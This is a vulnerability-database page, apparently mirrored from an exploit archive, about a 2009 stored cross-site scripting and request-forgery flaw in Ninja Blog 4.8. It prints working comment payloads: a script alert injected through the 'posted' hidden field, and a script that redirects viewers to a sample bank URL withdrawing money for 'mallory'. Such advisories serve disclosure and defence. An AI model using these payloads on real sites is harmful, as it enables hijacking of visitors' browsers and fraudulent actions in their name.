Ninja Blog 4.8 - Cross-Site Request Forgery/HTML Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057332 漏洞类型
发布时间 2009-01-19 更新时间 2009-01-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7834
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Vendor: http://ninjadesigns.co.uk
Version(s): Ninja Blog 4.8 (May also affect earlier versions)
Credit: Danny Moules
Critical: Yes

See PUSH 55 Advisory at https://www.push55.co.uk/index.php?s=ad&id=7

----

Due to insufficient validation of client-side data, we can inject script directly into the file-based storage used for blog comments.

When making a new comment, we simply fill the "posted" hidden field's value with...

<script>alert('xss');<script>"

...for an XSS attack OR...

<script>window.location="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory"</script>

...for a CRSF attack and otherwise submit the comment as usual.

Whenever that comment is viewed, the script is executed.

# milw0rm.com [2009-01-19]